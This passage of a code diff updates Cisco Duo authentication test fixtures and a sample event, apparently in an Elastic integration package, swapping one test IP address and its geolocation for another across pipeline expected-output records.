12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-08-12T09:14:23.060168+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1628759663,"txid":"861a81e7-1f60-4865-95eb-57d9c43ce073","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} 
+{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:20:54.700050+00:00","ood_software":null,"reason":"user_marked_fraud","result":"fraud","timestamp":1627024854,"txid":"78e1a910-350b-4226-828b-edb0ac2f2e3c","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:19:34.702203+00:00","ood_software":null,"reason":"user_mistake","result":"denied","timestamp":1627024774,"txid":"e22120cd-7388-424f-aa0a-b60cad42d8f3","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} \ No newline at end of file 
diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
index 99e613cacda..e8b524d0525 100644
--- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
+++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
@@ -7,30 +7,30 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
+ "89.160.20.156",
 "192.168.225.254"
 ]
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "user": {
 "name": "narroway@example.com",
 "id": "DU3KC77WJ06Y5HIV7XKQ",
@@ -42,12 +42,12 @@
 ]
 }
 },
- "ip": "169.232.89.219"
+ "ip": "89.160.20.156"
 },
 "event": {
 "reason": "user_approved",
- "ingested": "2021-09-13T18:13:42.697467161Z",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
+ "ingested": "2021-12-14T14:39:14.491566360Z",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
 "kind": "event",
 "category": "authentication",
 "type": "info",
@@ -76,7 +76,7 @@
 "access_device": {
 "is_password_set": "true",
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "java_version": "uninstalled",
 "location": {
 "country": "United States",
@@ -114,30 +114,29 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
- "169.232.89.112"
+ "89.160.20.156"
 ]
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "user": {
 "name": "narroway",
 "id": "DU3KC77WJ06Y5HIV7XKQ",
@@ -148,12 +147,12 @@
 ]
 }
 },
- "ip": "169.232.89.219"
+ "ip": "89.160.20.156"
 },
 "event": {
 "reason": "user_approved",
- "ingested": "2021-09-13T18:13:42.697473209Z",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
+ "ingested": "2021-12-14T14:39:14.491569010Z",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
 "kind": "event",
 "category": "authentication",
 "type": "info",
@@ -182,7 +181,7 @@
 "access_device": {
 "is_password_set": "unknown",
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "java_version": "uninstalled",
 "location": {
 "country": "United States",
@@ -201,22 +200,22 @@
 "factor": "duo_push",
 "auth_device": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "name": "+91 12345 12345",
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
 "location": {
@@ -224,7 +223,7 @@
 "city": "Ann Arbor",
 "state": "Michigan"
 },
- "ip": "169.232.89.112"
+ "ip": "89.160.20.156"
 },
 "email": "narroway@example.com"
 }
@@ -237,30 +236,29 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
- "169.232.89.112"
+ "89.160.20.156"
 ]
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "user": {
 "name": "narroway",
 "id": "DU3KC77WJ06Y5HIV7XKQ",
@@ -271,12 +269,12 @@
 ]
 }
 },
- "ip": "169.232.89.219"
+ "ip": "89.160.20.156"
 },
 "event": {
 "reason": "user_approved",
- "ingested": "2021-09-13T18:13:42.697475502Z",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
+ "ingested": "2021-12-14T14:39:14.491569481Z",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
 "kind": "event",
 "category": "authentication",
 "type": "info",
@@ -305,7 +303,7 @@
 "access_device": {
 "is_password_set": "unknown",
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "java_version": "uninstalled",
 "location": {
 "country": "United States",
@@ -324,22 +322,22 @@
 "factor": "duo_push",
 "auth_device": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "name": "+91 12345 12345",
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
 "location": {
@@ -347,7 +345,7 @@
 "city": "Ann Arbor",
 "state": "Michigan"
 },
- "ip": "169.232.89.112"
+ "ip": "89.160.20.156"
 },
 "email": "narroway@example.com"
 }
@@ -360,30 +358,29 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
- "169.232.89.112"
+ "89.160.20.156"
 ]
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "user": {
 "name": "narroway",
 "id": "DU3KC77WJ06Y5HIV7XKQ",
@@ -393,12 +390,12 @@
 ]
 }
 },
- "ip": "169.232.89.219"
+ "ip": "89.160.20.156"
 },
 "event": {
 "reason": "user_marked_fraud",
- "ingested": "2021-09-13T18:13:42.697477468Z",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
+ "ingested": "2021-12-14T14:39:14.491569897Z",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
 "kind": "event",
 "category": "authentication",
 "type": "info",
@@ -426,7 +423,7 @@
 "access_device": {
 "is_password_set": "unknown",
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "java_version": "uninstalled",
 "location": {
 "country": "United States",
@@ -445,22 +442,22 @@
 "factor": "duo_push",
 "auth_device": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "name": "+91 12345 12345",
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
 "location": {
@@ -468,7 +465,7 @@
 "city": "Ann Arbor",
 "state": "Michigan"
 },
- "ip": "169.232.89.112"
+ "ip": "89.160.20.156"
 }
 }
 }
@@ -480,30 +477,29 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
- "169.232.89.112"
+ "89.160.20.156"
 ]
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "user": {
 "name": "narroway",
 "id": "DU3KC77WJ06Y5HIV7XKQ",
@@ -513,12 +509,12 @@
 ]
 }
 },
- "ip": "169.232.89.219"
+ "ip": "89.160.20.156"
 },
 "event": {
 "reason": "user_mistake",
- "ingested": "2021-09-13T18:13:42.697479425Z",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"169.232.89.112\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
+ "ingested": "2021-12-14T14:39:14.491570308Z",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}",
 "kind": "event",
 "category": "authentication",
 "type": "info",
@@ -546,7 +542,7 @@
 "access_device": {
 "is_password_set": "unknown",
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "java_version": "uninstalled",
 "location": {
 "country": "United States",
@@ -565,22 +561,22 @@
 "factor": "duo_push",
 "auth_device": {
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-CA",
- "city_name": "Los Angeles",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "California",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-E",
+ "city_name": "Linköping",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Östergötland County",
 "location": {
- "lon": -118.4414,
- "lat": 34.0648
+ "lon": 15.6167,
+ "lat": 58.4167
 }
 },
 "name": "+91 12345 12345",
 "as": {
- "number": 52,
+ "number": 29518,
 "organization": {
- "name": "University of California, Los Angeles"
+ "name": "Bredband2 AB"
 }
 },
 "location": {
@@ -588,7 +584,7 @@
 "city": "Ann Arbor",
 "state": "Michigan"
 },
- "ip": "169.232.89.112"
+ "ip": "89.160.20.156"
 }
 }
 }
diff --git a/packages/cisco_duo/data_stream/auth/sample_event.json b/packages/cisco_duo/data_stream/auth/sample_event.json
index f4a78cc771c..0ff4316afc1 100644
--- a/packages/cisco_duo/data_stream/auth/sample_event.json
+++ b/packages/cisco_duo/data_stream/auth/sample_event.json
@@ -12,7 +12,7 @@
 "auth": {
 "access_device": {
 "flash_version": "uninstalled",
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "is_encryption_enabled": "true",
 "is_firewall_enabled": "true",
 "is_password_set": "true",
@@ -65,7 +65,7 @@
 "dataset": "cisco_duo.auth",
 "ingested": "2021-09-13T09:25:51Z",
 "kind": "event",
- "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"169.232.89.219\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
+ "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}",
 "outcome": "success",
 "reason": "user_approved",
 "type": "info"
@@ -78,12 +78,12 @@
 },
 "related": {
 "ip": [
- "169.232.89.219",
+ "89.160.20.156",
 "192.168.225.254"
 ]
 },
 "source": {
- "address": "169.232.89.219",
+ "address": "89.160.20.156",
 "as": {
 "number": 52,
 "organization": {
@@ -102,7 +102,7 @@
 "region_iso_code": "US-CA",
 "region_name": "California"
 },
- "ip": "169.232.89.219",
+ "ip": "89.160.20.156",
 "user": {
 "email": "narroway@example.com",
 "group": {
